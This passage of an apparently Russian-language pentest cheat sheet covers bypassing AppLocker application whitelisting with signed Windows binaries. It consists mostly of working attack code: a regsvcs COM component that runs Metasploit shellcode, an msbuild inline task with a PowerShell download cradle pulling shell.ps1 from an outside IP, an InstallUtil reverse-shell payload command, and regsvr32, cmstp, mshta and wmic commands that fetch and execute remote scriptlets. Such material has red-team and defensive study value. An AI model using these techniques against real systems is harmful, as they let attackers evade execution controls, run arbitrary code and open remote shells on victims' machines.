$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
Создаем файл regsvcs.cs:
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Create Your Strong Name Key -> key.snk
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk regsvcs.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
[OR]
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
//Executes UnRegisterClass If you don't have permissions
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
//This calls the UnregisterClass Method
*/
namespace regsvcser
{
public class Bypass : ServicedComponent
{
public Bypass() { Console.WriteLine("I am a basic COM Object"); }
[ComRegisterFunction] //This executes if registration is successful
public static void RegisterClass ( string key )
{
Console.WriteLine("I shouldn't really execute");
Shellcode.Exec();
}
[ComUnregisterFunction] //This executes if registration fails
public static void UnRegisterClass ( string key )
{
Console.WriteLine("I shouldn't really execute either.");
Shellcode.Exec();
}
}
public class Shellcode
{
public static void Exec()
{
// native function's compiled code
// generated with metasploit
// executes calc.exe
byte[] shellcode = new byte[193] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 };
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
// prepare data
IntPtr pinfo = IntPtr.Zero;
// execute native code
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return;
}
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
}
}
Второй вариант кода (попроще):
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Management.Automation;
namespace regsvcser
{
public class Bypass : ServicedComponent
{
public Bypass() { Console.WriteLine("I am a basic COM Object"); }
[ComUnregisterFunction] //This executes if registration fails
public static void UnRegisterClass ( string key )
{
PowerShell ps = PowerShell.Create();
ps.AddCommand("Invoke-Expression");
ps.AddArgument("payload");
ps.Invoke();
}
}
}
Компиляция:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk regsvcs.cs
- Опция /U запускает класс UnRegisterClass.
- Отсутствие опции /U запускает класс RegisterClass (или UnRegisterClass если нет прав).
Запуск:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
Интерпретаторы
- python
- perl
- java
И так далее
Макросы ворда
Макросы ворда VBS позволяют тоже обойти AppLocker и запустить произвольный код.
Небезопасные политики
Требуется посмотреть список директорий, откуда можно запускать файлы, и проверить какие из директорий/файлов доступны для записи.
InstallUtil
Для запуска PowerSherll см. amsi
Также можно воспользоваться утилитой: https://github.com/khr0x40sh/WhiteListEvasion
python InstallUtil.py --cs_file temp.cs --exe_file temp.exe --payload windows/shell_reverse_tcp --lhost 192.168.68.104 --lport 443
# компилируем
csc.exe temp.cs
# Запускаем
.\InstallUtil.exe /logfile= /LogToConsole=false /U temp.exe
regsvr32.exe
test.sct:
<?XML version="1.0"?>
<scriptlet>
<registration
progid="TESTING"
classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
<script language="JScript">
<![CDATA[
var foo = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>
regsvr32.exe /s /i:http://10.0.0.5/back.sct scrobj.dll
Microsoft.Workflow.Compiler.exe
test.xml:
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d2p1:string>test.xoml</d2p1:string>
</files>
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>
<generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>
<includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>
<linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>
<tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>
<warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel>
<win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<d2p1:checkTypes>false</d2p1:checkTypes>
<d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>
<d2p1:compilerOptions i:nil="true" />
<d2p1:generateCCU>false</d2p1:generateCCU>
<d2p1:languageToUse>CSharp</d2p1:languageToUse>
<d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />
<d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />
<d2p1:mtInfo i:nil="true" />
<d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />
</parameters>
</CompilerInput>
text.xoml:
<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="MyWorkflow" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
<CodeActivity x:Name="codeActivity1" />
<x:Code><![CDATA[
public class Foo : SequentialWorkflowActivity {
public Foo() {
Console.WriteLine("FOOO!!!!");
}
}
]]></x:Code>
</SequentialWorkflowActivity>
Microsoft.Workflow.Compiler.exe соберет XML-проет и запустит его:
C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe test.xml results.xml
Полный фрагмент кода для автоматизации запуска:
function New-CompilerInputXml {
<#
.SYNOPSIS
Creates a an XML file consisting of a serialized CompilerInput object.
.DESCRIPTION
New-CompilerInputXml creates an XML file consisting of compiler options. This file is required as the first argument for Microsoft.Workflow.Compiler.exe.
.PARAMETER XOMLPath
Specifies the path to the target XOML file. This can be a relative or absolute path. This path will be included in the resulting XML file that New-CompilerInputXml outputs.
.PARAMETER OutputPath
Specifies the path to which New-CompilerInputXml will save the serialized CompilerInput object.
.EXAMPLE
New-CompilerInputXml -XOMLPath C:\Test\foo.xoml -OutputPath test.xml
Outputs a serialized CompilerInput object to test.xml and specifies a full path to a XOML assembly reference.
.EXAMPLE
New-CompilerInputXml -XOMLPath foo.xoml -OutputPath test.txt
Outputs a serialized CompilerInput object to test.txt and specifies a XOML assembly reference using a relative path. Note that Microsoft.Workflow.Compiler.exe doesn't care about the extension supplied in the first argument.
.OUTPUTS
System.IO.FileInfo
Outputs a FileInfo object to serve as confirmation that the resulting serialized XML wil was created.
#>
[OutputType([System.IO.FileInfo])]
param (
[String]
[ValidateNotNullOrEmpty()]
$XOMLPath = 'test.xoml',
[Parameter(Mandatory = $True)]
[String]
[ValidateNotNullOrEmpty()]
$OutputPath
)
# This assembly won't be loaded by default. We need to load
# it in order to get access to the WorkflowCompilerParameters class.
Add-Type -AssemblyName 'System.Workflow.ComponentModel'
# This class contains the properties we need to specify for Microsoft.Workflow.Compiler.exe
$WFCompilerParams = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
# Necessary to get Microsoft.Workflow.Compiler.exe to call Assembly.Load(byte[])
$WFCompilerParams.GenerateInMemory = $True
# Full path to Microsoft.Workflow.Compiler.exe that we will load and access a non-public method from
$WorkflowCompilerPath = [Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory() + 'Microsoft.Workflow.Compiler.exe'
# Load the assembly
$WFCAssembly = [Reflection.Assembly]::LoadFrom($WorkflowCompilerPath)
# This is the helper method that will serialize the CompilerInput object to disk
$SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')
$TempFile = $SerializeInputToWrapper.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $WFCompilerParams, [String[]] @(,$OutputPath)))
Move-Item $TempFile $OutputPath -PassThru
}
Подробнее тут: https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
msbuild.exe
test.csproj:
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" />
<!-- Your PowerShell Path May vary -->
<Code Type="Class" Language="cs">
<![CDATA[
// all code by Casey Smith @SubTee
using System;
using System.Reflection;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
public class ClassExample : Task, ITask
{
public override bool Execute()
{
//Console.WriteLine("Hello From a Class.");
Console.WriteLine(powaShell.RunPSCommand());
return true;
}
}
//Based on Jared Atkinson's And Justin Warner's Work
public class powaShell
{
public static string RunPSCommand()
{
//Init stuff
InitialSessionState iss = InitialSessionState.CreateDefault();
iss.LanguageMode = PSLanguageMode.FullLanguage;
Runspace runspace = RunspaceFactory.CreateRunspace(iss);
runspace.Open();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
Pipeline pipeline = runspace.CreatePipeline();
//Interrogate LockDownPolicy
Console.WriteLine(System.Management.Automation.Security.SystemPolicy.GetSystemLockdownPolicy());
//Add commands
pipeline.Commands.AddScript("IEX (iwr 'http://10.10.10.10/shell.ps1')"); // powershell 3.0+ download cradle
//Prep PS for string output and invoke
pipeline.Commands.Add("Out-String");
Collection<PSObject> results = pipeline.Invoke();
runspace.Close();
//Convert records to strings
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
{
stringBuilder.Append(obj);
}
return stringBuilder.ToString().Trim();
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
Скрипт загружает powershell-файл по ссылке http://10.10.10.10/shell.ps1
Нужно только скомпилировать проект:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Users\Public\Downloads\powashell.csproj
cmstp.exe
Местоположение файлов:
# x64
C:\Windows\System32\cmstp.exe
# x32
C:\Windows\SysWOW64\cmstp.exe
Запуск DLL
Содержимое файла cmstp.inf (отредактировать путь до dll):
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\test.PENTESTLAB\pentestlab.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"
Запуск:
cmstp.exe /s cmstp.inf
Запуск SCT
Файл SCT можно найти тут: https://gist.github.com/NickTyrer/0604bb9d7bcfef9e0cf82c28a7b76f0f/
Или другой вариант SCT: https://gist.github.com/netbiosX/297ea22d3475bb7216a7525f1ee82568
Содержимое файла cmstp.inf (отредактировать путь до powersct.sct):
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://10.0.0.2/tmp/powersct.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"
Windows Script Host
mshta.exe
Запуск .hta файлов.
Пример:
# Нужен полный путь до файла
mshta.exe C:\test.hta
# или http-ссылка
mshta.exe http://1.1.1.1/test.hta
wscript.exe
Запуск Wscript(.wsf) файлов.
cscript.exe
Заапуск VBScript(.vbs), Jscript(.js) и Wscript(.wsf) файлов.
WMIC + XLS
test.xls:
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc");
]]> </ms:script>
</stylesheet>
Запуск:
wmic os get /FORMAT:"test.xsl"
# Или http
wmic process get brief /format:"http://10.0.2.4:8000/applocker_xsl.xsl"